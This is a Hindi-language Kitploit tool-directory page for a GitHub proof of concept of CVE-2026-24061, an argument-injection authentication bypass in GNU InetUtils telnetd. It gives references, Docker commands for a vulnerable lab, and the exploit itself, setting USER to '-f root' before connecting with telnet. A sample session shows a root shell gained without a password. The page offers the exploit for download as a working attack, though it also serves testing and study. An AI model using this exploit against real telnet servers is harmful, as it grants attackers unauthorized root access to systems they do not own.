Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — GNU InetUtils से GNU telnetd सेवा प्रमाणीकरण-बाईपास | Kitploit
उपकरण/GitHubGitHub/typeconfused/cve-2026-24061
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtypeconfused/cve-2026-24061

CVE-2026-24061

GNU InetUtils से GNU telnetd सेवा प्रमाणीकरण-बाईपास

रिपॉजिटरी देखें
298 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

GNU InetUtils telnetd आर्गुमेंट इंजेक्शन प्रमाणीकरण बायपास (CVE-2026-24061)

जनवरी 2026 में, GNU InetUtils की GNU telnetd सेवा में Kyu Neushwaistein (उर्फ Carlos Cortes Alvarez) द्वारा प्रमाणीकरण-बायपास भेद्यता पाई गई। CVE-2026-24061 के रूप में ट्रैक की गई यह खामी एक हमलावर को वैध क्रेडेंशियल प्रदान किए बिना Telnet सत्र स्थापित करने की अनुमति देती है, जिससे लक्ष्य प्रणाली तक अनधिकृत पहुंच मिलती है। यह भेद्यता GNU telnetd सेवा के संस्करण 2.7-2 तक मौजूद है और ऐसा लगता है जैसे इसे सीधे 90 के दशक से लिया गया हो।

यह एक आर्गुमेंट इंजेक्शन भेद्यता (CWE-88) है जिसका CVSS v3.1 स्कोर 9.8 (क्रिटिकल) है।

संदर्भ:

  • https://www.openwall.com/lists/oss-security/2026/01/20/2
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24061
  • https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
  • https://github.com/SafeBreach-Labs/CVE-2026-24061

भेद्य वातावरण

निर्माण और चलाएं:

docker build -t telnetd-cve-2026-24061 .
docker run --rm -it -p 23:23 telnetd-cve-2026-24061

सेवा शुरू होने के बाद, telnetd पोर्ट 23 पर सुन रहा होगा।

शोषण

यह भेद्यता USER पर्यावरण चर में -f फ्लैग इंजेक्ट करके प्रमाणीकरण को बायपास करने की अनुमति देती है। जब telnetd को -f से शुरू होने वाला उपयोगकर्ता नाम प्राप्त होता है, तो यह इसे लॉगिन प्रोग्राम को भेजता है जो -f को प्रमाणीकरण छोड़ने के फ्लैग के रूप में व्याख्या करता है।

इस भेद्यता का शोषण करने और root पहुंच प्राप्त करने के लिए निम्न कमांड का उपयोग करें:

# Linux क्लाइंट (-a विकल्प की आवश्यकता है)
USER="-f root" telnet -a 127.0.0.1 23

# macOS क्लाइंट (-a विकल्प की आवश्यकता नहीं)
USER="-f root" telnet 127.0.0.1 23

सफल शोषण के बाद, आपको पासवर्ड प्रदान किए बिना root शेल पहुंच प्राप्त होगी।

$ USER='-f root' telnet -a localhost 23
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

Linux 6.14.0-37-generic (4dbc1b976c10) (pts/1)

Linux 4dbc1b976c10 6.14.0-37-generic #37~24.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Nov 20 10:25:38 UTC 2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@4dbc1b976c10:~# id
uid=0(root) gid=0(root) groups=0(root)
टूल डाउनलोड करें